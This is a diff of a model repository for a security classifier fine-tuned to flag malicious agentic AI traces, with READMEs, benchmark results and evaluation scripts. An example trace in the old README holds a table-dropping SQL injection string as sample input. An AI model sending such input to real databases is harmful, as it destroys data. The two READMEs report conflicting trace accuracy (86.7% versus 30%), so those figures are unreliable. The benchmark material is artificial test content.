1. **False Positive Rate (66.7%)**: Model misclassifies 2/3 of benign workflows as malicious, creating unsustainable alert fatigue. Root cause is training data imbalance (90% attack-focused).
|
| 269 |
+
|
| 270 |
+
2. **Prompt Engineering Cannot Fix Bias**: Ablation study proved that enhanced prompting with explicit benign workflow guidance yielded **zero improvement** in FPR. Dataset composition determines learned representations that persist regardless of instructions.
|
| 271 |
+
|
| 272 |
+
3. **Trace Analysis vs MCQA Gap**: Despite 74.29% MCQA performance, practical trace classification achieves only 30% accuracy—demonstrating that knowledge retention ≠ operational capability.
|
| 273 |
+
|
| 274 |
+
### Architectural Solutions Required
|
| 275 |
+
|
| 276 |
+
**Proposed V5 Improvements**:
|
| 277 |
+
- **Balanced Dataset**: 80K benign + 80K malicious traces (160K total)
|
| 278 |
+
- **Target Metrics**: 30-50% FPR, 75-85% TPR, ≥65% TNR, ≥75% accuracy
|
| 279 |
+
- **Alternative**: RAG augmentation with 10K+ benign workflow knowledge base
|
| 280 |
+
|
| 281 |
+
### Additional Limitations
|
| 282 |
+
|
| 283 |
+
4. **Small Evaluation Sample**: 30 traces provide wide confidence intervals (±18%), limiting generalizability
|
| 284 |
+
|
| 285 |
+
5. **Synthetic Data Bias**: 43% synthetic training data may not capture real-world attack diversity, zero-day exploits, or enterprise-specific patterns
|
| 286 |
+
|
| 287 |
+
6. **ARM64-Specific**: Training validated only on NVIDIA DGX Spark; x86_64 CPU training 5-10× slower
|
| 288 |
+
|
| 289 |
+
7. **Domain Specificity**: Focused on agentic security; may not generalize to other security domains
|
| 290 |
+
|
| 291 |
+
8. **No Commercial Comparison**: Not benchmarked against GPT-4, Claude 3.5 Sonnet, or commercial security models
|
| 292 |
+
|
| 293 |
+
## 🔧 Reproduction & Extension
|
| 294 |
+
|
| 295 |
+
### Setup Environment (ARM64)
|
| 296 |
+
|
| 297 |
+
```bash
|
| 298 |
+
# Clone repository
|
| 299 |
+
git clone https://huggingface.co/guerilla7/agentic-safety-gguf
|
| 300 |
+
cd agentic-safety-gguf
|
| 301 |
+
|
| 302 |
+
# Install dependencies (ARM64)
|
| 303 |
+
bash install_arm64.sh
|
| 304 |
+
|
| 305 |
+
# Or manually:
|
| 306 |
+
pip install torch==2.5.1+cu126 --index-url https://download.pytorch.org/whl/cu126
|
| 307 |
+
pip install transformers datasets peft bitsandbytes accelerate unsloth
|
| 308 |
+
```
|
| 309 |
+
|
| 310 |
+
### Training Script
|
| 311 |
+
|
| 312 |
+
```bash
|
| 313 |
+
python train.py \
|
| 314 |
+
--base_model fdtn-ai/Foundation-Sec-8B-Instruct \
|
| 315 |
+
--dataset training_data_v3_synthetic.jsonl \
|
| 316 |
+
--output output_models/foundation-sec-v2 \
|
| 317 |
+
--config training_config.yaml
|
| 318 |
+
```
|
| 319 |
+
|
| 320 |
+
### Evaluation
|
| 321 |
+
|
| 322 |
+
```bash
|
| 323 |
+
# MMLU Security Studies
|
| 324 |
+
python evaluate_mmlu.py --model output_models/foundation-sec-v4
|
| 325 |
+
|
| 326 |
+
# Custom MCQA (70 questions)
|
| 327 |
+
python evaluate_mcqa.py --model output_models/foundation-sec-v4
|
| 328 |
+
|
| 329 |
+
# Trace Security (30 traces)
|
| 330 |
+
python evaluate_traces.py --model output_models/foundation-sec-v4
|
| 331 |
+
```
|
| 332 |
+
|
| 333 |
+
### Files Included
|
| 334 |
+
|
| 335 |
+
- `train.py` - QLoRA fine-tuning script
|
| 336 |
+
- `training_config.yaml` - Complete hyperparameters (LoRA, optimizer, scheduler)
|
| 337 |
+
- `evaluate_mmlu.py` - MMLU Security Studies benchmark
|
| 338 |
+
- `evaluate_mcqa.py` - Custom 70-question cybersecurity MCQA
|
| 339 |
+
- `evaluate_traces.py` - OpenTelemetry trace classification
|
| 340 |
+
- `generate_synthetic.py` - Synthetic workflow trace generation
|
| 341 |
+
- `install_arm64.sh` - ARM64 environment setup (Triton, bitsandbytes)
|
| 342 |
+
- `CITATION.bib` - BibTeX citation
|
| 343 |
+
- `LICENSE` - Apache 2.0
|
| 344 |
|
| 345 |
## 📝 Citation
|
| 346 |
|
| 347 |
+
If you use this model or methodology in your research, please cite:
|
| 348 |
+
|
| 349 |
```bibtex
|
| 350 |
+
@misc{foundation-sec-2025,
|
| 351 |
+
title={Temporal Attack Pattern Detection in Multi-Agent AI Workflows: An Open Framework for Training Trace-Based Security Models},
|
| 352 |
+
author={Ron F. Del Rosario},
|
| 353 |
year={2025},
|
| 354 |
+
publisher={HuggingFace},
|
| 355 |
+
note={First openly documented methodology for fine-tuning LLMs on agentic workflow security},
|
| 356 |
+
url={https://huggingface.co/guerilla7/agentic-safety-gguf}
|
| 357 |
}
|
| 358 |
```
|
| 359 |
|
| 360 |
+
## 🔗 Links
|
| 361 |
+
|
| 362 |
+
- **Dataset Repository**: [guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf)
|
| 363 |
+
- **Base Model**: [fdtn-ai/Foundation-Sec-8B-Instruct](https://huggingface.co/fdtn-ai/Foundation-Sec-8B-Instruct)
|
| 364 |
+
- **OWASP Top 10 Agentic**: [OWASP GenAI Security](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/)
|
| 365 |
+
- **Microsoft Agentic Taxonomy**: [Failure Modes in Agentic AI](https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/final/en-us/microsoft-brand/documents/Taxonomy-of-Failure-Mode-in-Agentic-AI-Systems-Whitepaper.pdf)
|
| 366 |
+
|
| 367 |
+
## 👤 Contact
|
| 368 |
+
|
| 369 |
+
**Author**: Ron F. Del Rosario
|
| 370 |
+
**Affiliation**: SAP, OWASP Gen AI Security Project - Agentic Security Initiative (ASI)
|
| 371 |
+
**HuggingFace**: [@guerilla7](https://huggingface.co/guerilla7)
|
| 372 |
+
**LinkedIn**: [ronaldfloresdelrosario](https://www.linkedin.com/in/ronaldfloresdelrosario/)
|
| 373 |
+
|
| 374 |
+
## 📜 License
|
| 375 |
+
|
| 376 |
+
Apache 2.0 (inherited from Foundation-Sec-8B-Instruct)
|
| 377 |
+
|
| 378 |
+
## 🙏 Acknowledgements
|
| 379 |
+
|
| 380 |
+
Built on **Llama 3.1 8B Instruct** by Meta and **Foundation-Sec-8B-Instruct** by FDTN AI. Inspired by OWASP GenAI Security Project and the open-source AI safety community. Training enabled by NVIDIA DGX Spark (Grace Blackwell ARM64 architecture).
|
| 381 |
+
|
| 382 |
+
**Special Thanks**: AgentHarm, Agent-SafetyBench, PKU-SafeRLHF, BeaverTails, HaluEval, TruthfulQA, and 12 other public dataset contributors enabling reproducible security research.
|
| 383 |
+
|
| 384 |
+
---
|
| 385 |
|
| 386 |
+
**⚠️ Responsible Use**: This model is designed for **defensive security research and education only**. It contains knowledge of attack techniques and should not be used to develop malicious tools. Always follow responsible disclosure practices and obtain proper authorization before security testing.
|
|
|
|
|
|
|
|
|
README_OLD.md
ADDED
|
@@ -0,0 +1,264 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
---
|
| 2 |
+
license: apache-2.0
|
| 3 |
+
base_model: meta-llama/Llama-3.1-8B-Instruct
|
| 4 |
+
tags:
|
| 5 |
+
- cybersecurity
|
| 6 |
+
- agentic-ai
|
| 7 |
+
- security
|
| 8 |
+
- llm-security
|
| 9 |
+
- owasp
|
| 10 |
+
- qlora
|
| 11 |
+
- fine-tuned
|
| 12 |
+
model-index:
|
| 13 |
+
- name: Foundation-Sec-8B-Instruct-v3
|
| 14 |
+
results:
|
| 15 |
+
- task:
|
| 16 |
+
type: question-answering
|
| 17 |
+
name: MMLU Security Studies
|
| 18 |
+
metrics:
|
| 19 |
+
- type: accuracy
|
| 20 |
+
value: 72.7
|
| 21 |
+
name: Accuracy
|
| 22 |
+
- task:
|
| 23 |
+
type: question-answering
|
| 24 |
+
name: Custom MCQA
|
| 25 |
+
metrics:
|
| 26 |
+
- type: accuracy
|
| 27 |
+
value: 71.3
|
| 28 |
+
name: Accuracy
|
| 29 |
+
- task:
|
| 30 |
+
type: text-classification
|
| 31 |
+
name: Trace Security
|
| 32 |
+
metrics:
|
| 33 |
+
- type: accuracy
|
| 34 |
+
value: 86.7
|
| 35 |
+
name: Accuracy
|
| 36 |
+
---
|
| 37 |
+
|
| 38 |
+
# Foundation-Sec: Specialized Fine-Tuning for Agentic AI Security
|
| 39 |
+
|
| 40 |
+
**Model**: Llama 3.1 8B + QLoRA → Foundation-Sec
|
| 41 |
+
**Datasets**: [guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf) (80,851 examples)
|
| 42 |
+
**Format**: GGUF Q4_K_M quantized for llama.cpp deployment
|
| 43 |
+
|
| 44 |
+
## Model Description
|
| 45 |
+
|
| 46 |
+
Foundation-Sec is a specialized security model fine-tuned from Llama 3.1 8B Instruct for analyzing agentic AI security vulnerabilities, particularly focusing on OWASP GenAI Top 10 threats in multi-agent systems.
|
| 47 |
+
|
| 48 |
+
### Key Capabilities
|
| 49 |
+
|
| 50 |
+
1. **Security Vulnerability Detection**: Identifies OWASP GenAI Top 10 vulnerabilities (ASI01-ASI10)
|
| 51 |
+
2. **OpenTelemetry Trace Analysis**: Classifies distributed traces as benign or malicious
|
| 52 |
+
3. **Security Q&A**: Answers technical questions about LLM agent security
|
| 53 |
+
4. **Attack Pattern Recognition**: Detects prompt injection, multi-agent attacks, tool manipulation, data poisoning, etc.
|
| 54 |
+
|
| 55 |
+
### Performance
|
| 56 |
+
|
| 57 |
+
| Benchmark | Base Llama 3.1 8B | Foundation-Sec v3 | Improvement |
|
| 58 |
+
|-----------|-------------------|-------------------|-------------|
|
| 59 |
+
| **MMLU Security Studies** | 63.6% | **72.7%** | +9.1pp |
|
| 60 |
+
| **Custom MCQA** | 47.9% | **71.3%** | +23.4pp |
|
| 61 |
+
| **Trace Security** | 46.7% | **86.7%** | +40.0pp |
|
| 62 |
+
|
| 63 |
+
**Statistical Significance**: McNemar's χ²=18.05, p<0.001, Cohen's h=0.65 (large effect)
|
| 64 |
+
|
| 65 |
+
### ⚠️ Critical Limitation
|
| 66 |
+
|
| 67 |
+
**False Positive Rate**: 66.7% on trace security classification
|
| 68 |
+
|
| 69 |
+
This model is **NOT production-ready** for automated security decisions. Always use with human oversight.
|
| 70 |
+
|
| 71 |
+
## Quick Start
|
| 72 |
+
|
| 73 |
+
### Using llama.cpp (GGUF)
|
| 74 |
+
|
| 75 |
+
```bash
|
| 76 |
+
# Download GGUF model
|
| 77 |
+
huggingface-cli download guerilla7/agentic-safety-gguf foundation-sec-v3-Q4_K_M.gguf
|
| 78 |
+
|
| 79 |
+
# Run inference
|
| 80 |
+
./llama.cpp/main \
|
| 81 |
+
-m foundation-sec-v3-Q4_K_M.gguf \
|
| 82 |
+
-p "Analyze this agentic workflow for security vulnerabilities: User input flows directly into tool parameters without validation." \
|
| 83 |
+
--n-gpu-layers 35 \
|
| 84 |
+
--ctx-size 4096
|
| 85 |
+
|
| 86 |
+
# Or start server
|
| 87 |
+
./llama.cpp/server \
|
| 88 |
+
-m foundation-sec-v3-Q4_K_M.gguf \
|
| 89 |
+
--host 0.0.0.0 \
|
| 90 |
+
--port 8080 \
|
| 91 |
+
--n-gpu-layers 35
|
| 92 |
+
```
|
| 93 |
+
|
| 94 |
+
### Using Transformers
|
| 95 |
+
|
| 96 |
+
```python
|
| 97 |
+
from transformers import AutoModelForCausalLM, AutoTokenizer
|
| 98 |
+
|
| 99 |
+
model_name = "guerilla7/agentic-safety-gguf"
|
| 100 |
+
tokenizer = AutoTokenizer.from_pretrained(model_name)
|
| 101 |
+
model = AutoModelForCausalLM.from_pretrained(
|
| 102 |
+
model_name,
|
| 103 |
+
torch_dtype="auto",
|
| 104 |
+
device_map="auto"
|
| 105 |
+
)
|
| 106 |
+
|
| 107 |
+
messages = [
|
| 108 |
+
{"role": "user", "content": "What are the top 3 OWASP GenAI vulnerabilities for multi-agent systems?"}
|
| 109 |
+
]
|
| 110 |
+
|
| 111 |
+
inputs = tokenizer.apply_chat_template(messages, return_tensors="pt").to(model.device)
|
| 112 |
+
outputs = model.generate(inputs, max_new_tokens=512, temperature=0.7)
|
| 113 |
+
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
|
| 114 |
+
print(response)
|
| 115 |
+
```
|
| 116 |
+
|
| 117 |
+
### Analyze OpenTelemetry Trace
|
| 118 |
+
|
| 119 |
+
```python
|
| 120 |
+
import json
|
| 121 |
+
|
| 122 |
+
trace = {
|
| 123 |
+
"trace_id": "abc123",
|
| 124 |
+
"spans": [
|
| 125 |
+
{"name": "user_request", "attributes": {"input": "'; DROP TABLE users; --"}},
|
| 126 |
+
{"name": "database_query", "attributes": {"query": "SELECT * FROM users WHERE id='...'"}}
|
| 127 |
+
]
|
| 128 |
+
}
|
| 129 |
+
|
| 130 |
+
prompt = f"Analyze this trace for security threats:\n{json.dumps(trace)}"
|
| 131 |
+
# ... (use model as shown above)
|
| 132 |
+
```
|
| 133 |
+
|
| 134 |
+
## Training
|
| 135 |
+
|
| 136 |
+
Trained using QLoRA on NVIDIA DGX Spark (ARM64 Blackwell GPU):
|
| 137 |
+
|
| 138 |
+
- **Base Model**: meta-llama/Llama-3.1-8B-Instruct
|
| 139 |
+
- **Method**: QLoRA (r=64, alpha=128, dropout=0.1)
|
| 140 |
+
- **Dataset**: 80,851 examples (45,825 base + 35,026 synthetic)
|
| 141 |
+
- **Hyperparameters**: lr=2e-4, batch=16 (effective), epochs=3
|
| 142 |
+
- **Training Time**: ~8 hours
|
| 143 |
+
- **Hardware**: NVIDIA Blackwell GPU (96GB VRAM)
|
| 144 |
+
|
| 145 |
+
See `train.py` and `training_config.yaml` for complete configuration.
|
| 146 |
+
|
| 147 |
+
## Datasets
|
| 148 |
+
|
| 149 |
+
Training and evaluation datasets available at: [guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf)
|
| 150 |
+
|
| 151 |
+
- **training_data_v3_synthetic.jsonl** (212MB): Final training dataset
|
| 152 |
+
- **cybersecurity_questions.jsonl**: Custom MCQA evaluation
|
| 153 |
+
- **benign/malicious_traces.json**: Trace security evaluation
|
| 154 |
+
|
| 155 |
+
## Reproduction
|
| 156 |
+
|
| 157 |
+
### Setup Environment (ARM64)
|
| 158 |
+
|
| 159 |
+
```bash
|
| 160 |
+
# Install ARM64 dependencies
|
| 161 |
+
bash install_arm64.sh
|
| 162 |
+
|
| 163 |
+
# Or manually:
|
| 164 |
+
pip install torch==2.3.0+cu121 --index-url https://download.pytorch.org/whl/cu121
|
| 165 |
+
pip install transformers datasets peft bitsandbytes accelerate
|
| 166 |
+
```
|
| 167 |
+
|
| 168 |
+
### Train Model
|
| 169 |
+
|
| 170 |
+
```bash
|
| 171 |
+
python train.py \
|
| 172 |
+
--base_model meta-llama/Llama-3.1-8B-Instruct \
|
| 173 |
+
--dataset datasets/training_data_v3_synthetic.jsonl \
|
| 174 |
+
--output output_models/foundation-sec-v3 \
|
| 175 |
+
--config training_config.yaml
|
| 176 |
+
```
|
| 177 |
+
|
| 178 |
+
### Evaluate
|
| 179 |
+
|
| 180 |
+
```bash
|
| 181 |
+
# MMLU Security Studies
|
| 182 |
+
python evaluate_mmlu.py --model output_models/foundation-sec-v3
|
| 183 |
+
|
| 184 |
+
# Custom MCQA
|
| 185 |
+
python evaluate_mcqa.py --model output_models/foundation-sec-v3
|
| 186 |
+
|
| 187 |
+
# Trace Security
|
| 188 |
+
python evaluate_traces.py --model output_models/foundation-sec-v3
|
| 189 |
+
```
|
| 190 |
+
|
| 191 |
+
## Files in This Repository
|
| 192 |
+
|
| 193 |
+
- `train.py` - QLoRA fine-tuning script
|
| 194 |
+
- `training_config.yaml` - Complete hyperparameters
|
| 195 |
+
- `evaluate_mmlu.py` - MMLU Security Studies evaluation
|
| 196 |
+
- `evaluate_mcqa.py` - Custom MCQA evaluation
|
| 197 |
+
- `evaluate_traces.py` - Trace security classification
|
| 198 |
+
- `generate_synthetic.py` - Synthetic data generation
|
| 199 |
+
- `install_arm64.sh` - ARM64 environment setup
|
| 200 |
+
- `RESEARCH_PAPER.pdf` - Full methodology (25 pages)
|
| 201 |
+
- `CITATION.bib` - BibTeX citation
|
| 202 |
+
|
| 203 |
+
## Use Cases
|
| 204 |
+
|
| 205 |
+
### ✅ Recommended
|
| 206 |
+
|
| 207 |
+
- Research on agentic AI security
|
| 208 |
+
- Educational demonstrations of attack patterns
|
| 209 |
+
- Prototyping security analysis tools
|
| 210 |
+
- Benchmarking other security models
|
| 211 |
+
- Understanding OWASP GenAI vulnerabilities
|
| 212 |
+
|
| 213 |
+
### ❌ Not Recommended
|
| 214 |
+
|
| 215 |
+
- Production security monitoring (66.7% FPR)
|
| 216 |
+
- Fully automated security decisions
|
| 217 |
+
- Mission-critical security applications
|
| 218 |
+
- Regulatory compliance tools (without extensive validation)
|
| 219 |
+
|
| 220 |
+
## Limitations
|
| 221 |
+
|
| 222 |
+
1. **High False Positive Rate**: 66.7% FPR on trace classification
|
| 223 |
+
2. **Synthetic Data Bias**: 43% synthetic data may not reflect real attacks
|
| 224 |
+
3. **Model Size**: 8B parameters may miss complex attack patterns
|
| 225 |
+
4. **Domain Specificity**: Focused on agentic security, may not generalize
|
| 226 |
+
5. **ARM64 Only**: Training validated only on NVIDIA DGX Spark
|
| 227 |
+
|
| 228 |
+
See research paper Section 0.7 for detailed limitations.
|
| 229 |
+
|
| 230 |
+
## Ethical Considerations
|
| 231 |
+
|
| 232 |
+
- **Defensive Use Only**: Model designed for security research and defense
|
| 233 |
+
- **Attack Pattern Exposure**: Contains knowledge of attack techniques
|
| 234 |
+
- **Human Oversight Required**: Not suitable for autonomous security decisions
|
| 235 |
+
- **Responsible Disclosure**: Follow responsible disclosure for any discovered vulnerabilities
|
| 236 |
+
|
| 237 |
+
## Citation
|
| 238 |
+
|
| 239 |
+
```bibtex
|
| 240 |
+
@article{foundation-sec-2025,
|
| 241 |
+
title={Foundation-Sec: Specialized Fine-Tuning for Agentic AI Security},
|
| 242 |
+
author={Your Name},
|
| 243 |
+
year={2025},
|
| 244 |
+
url={https://huggingface.co/guerilla7/agentic-safety-gguf}
|
| 245 |
+
}
|
| 246 |
+
```
|
| 247 |
+
|
| 248 |
+
## License
|
| 249 |
+
|
| 250 |
+
Apache 2.0
|
| 251 |
+
|
| 252 |
+
## Research Paper
|
| 253 |
+
|
| 254 |
+
Full methodology, statistical analysis, and detailed results available in `RESEARCH_PAPER.pdf` (25 pages).
|
| 255 |
+
|
| 256 |
+
## Links
|
| 257 |
+
|
| 258 |
+
- **Datasets**: [guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf)
|
| 259 |
+
- **GGUF Model**: Available in this repository
|
| 260 |
+
- **Training Scripts**: Included in this repository
|
| 261 |
+
|
| 262 |
+
## Acknowledgements
|
| 263 |
+
|
| 264 |
+
Built on Llama 3.1 8B Instruct by Meta. Inspired by OWASP GenAI Security Project and open-source AI safety community.
|
evaluate_mcqa.py
ADDED
|
@@ -0,0 +1,55 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""Custom MCQA evaluation for cybersecurity questions."""
|
| 3 |
+
|
| 4 |
+
import json
|
| 5 |
+
import argparse
|
| 6 |
+
from transformers import AutoModelForCausalLM, AutoTokenizer
|
| 7 |
+
import torch
|
| 8 |
+
|
| 9 |
+
def evaluate_mcqa(model_name, questions_file):
|
| 10 |
+
"""Evaluate model on custom MCQA questions."""
|
| 11 |
+
|
| 12 |
+
# Load model
|
| 13 |
+
print(f"Loading model: {model_name}")
|
| 14 |
+
tokenizer = AutoTokenizer.from_pretrained(model_name)
|
| 15 |
+
model = AutoModelForCausalLM.from_pretrained(
|
| 16 |
+
model_name,
|
| 17 |
+
torch_dtype=torch.float16,
|
| 18 |
+
device_map="auto"
|
| 19 |
+
)
|
| 20 |
+
|
| 21 |
+
# Load questions
|
| 22 |
+
with open(questions_file) as f:
|
| 23 |
+
questions = [json.loads(line) for line in f]
|
| 24 |
+
|
| 25 |
+
correct = 0
|
| 26 |
+
total = len(questions)
|
| 27 |
+
|
| 28 |
+
for i, q in enumerate(questions):
|
| 29 |
+
prompt = f"{q['question']}\nA) {q['A']}\nB) {q['B']}\nC) {q['C']}\nD) {q['D']}\nAnswer:"
|
| 30 |
+
|
| 31 |
+
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
|
| 32 |
+
outputs = model.generate(**inputs, max_new_tokens=10)
|
| 33 |
+
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
|
| 34 |
+
|
| 35 |
+
# Extract answer (A/B/C/D)
|
| 36 |
+
predicted = response.split("Answer:")[-1].strip()[0].upper()
|
| 37 |
+
|
| 38 |
+
if predicted == q['answer']:
|
| 39 |
+
correct += 1
|
| 40 |
+
|
| 41 |
+
if (i + 1) % 10 == 0:
|
| 42 |
+
print(f"Progress: {i+1}/{total}")
|
| 43 |
+
|
| 44 |
+
accuracy = 100.0 * correct / total
|
| 45 |
+
print(f"\nAccuracy: {correct}/{total} = {accuracy:.1f}%")
|
| 46 |
+
|
| 47 |
+
return accuracy
|
| 48 |
+
|
| 49 |
+
if __name__ == "__main__":
|
| 50 |
+
parser = argparse.ArgumentParser()
|
| 51 |
+
parser.add_argument("--model", required=True, help="Model name or path")
|
| 52 |
+
parser.add_argument("--questions", default="datasets/cybersecurity_questions.jsonl")
|
| 53 |
+
args = parser.parse_args()
|
| 54 |
+
|
| 55 |
+
evaluate_mcqa(args.model, args.questions)
|
evaluate_mmlu.py
ADDED
|
@@ -0,0 +1,195 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""
|
| 3 |
+
Evaluate Foundation-Sec-8B base model on custom cybersecurity MCQA benchmark.
|
| 4 |
+
This provides the baseline comparison for our fine-tuned V2/V3/V4 models.
|
| 5 |
+
"""
|
| 6 |
+
|
| 7 |
+
import json
|
| 8 |
+
import torch
|
| 9 |
+
from transformers import AutoTokenizer, AutoModelForCausalLM
|
| 10 |
+
from tqdm import tqdm
|
| 11 |
+
import argparse
|
| 12 |
+
from datetime import datetime
|
| 13 |
+
|
| 14 |
+
def load_questions(filepath):
|
| 15 |
+
"""Load the 70-question custom MCQA benchmark."""
|
| 16 |
+
questions = []
|
| 17 |
+
with open(filepath, 'r') as f:
|
| 18 |
+
for line in f:
|
| 19 |
+
questions.append(json.loads(line))
|
| 20 |
+
return questions
|
| 21 |
+
|
| 22 |
+
def format_prompt(question_data):
|
| 23 |
+
"""Format question in the same way as lm-eval-harness."""
|
| 24 |
+
question = question_data['question']
|
| 25 |
+
choices = question_data['choices']
|
| 26 |
+
|
| 27 |
+
# Format as multiple choice
|
| 28 |
+
prompt = f"Question: {question}\n\n"
|
| 29 |
+
for i, choice in enumerate(choices):
|
| 30 |
+
prompt += f"{chr(65+i)}) {choice}\n"
|
| 31 |
+
prompt += "\nAnswer:"
|
| 32 |
+
|
| 33 |
+
return prompt
|
| 34 |
+
|
| 35 |
+
def get_model_answer(model, tokenizer, prompt, device):
|
| 36 |
+
"""Get model's predicted answer (A, B, C, or D)."""
|
| 37 |
+
# Format in Llama 3.1 Instruct style
|
| 38 |
+
full_prompt = f"""<|begin_of_text|><|start_header_id|>system<|end_header_id|>
|
| 39 |
+
|
| 40 |
+
You are a cybersecurity expert. Answer the following multiple choice question by selecting the letter of the correct answer (A, B, C, or D).<|eot_id|>
|
| 41 |
+
|
| 42 |
+
<|start_header_id|>user<|end_header_id|>
|
| 43 |
+
|
| 44 |
+
{prompt}<|eot_id|>
|
| 45 |
+
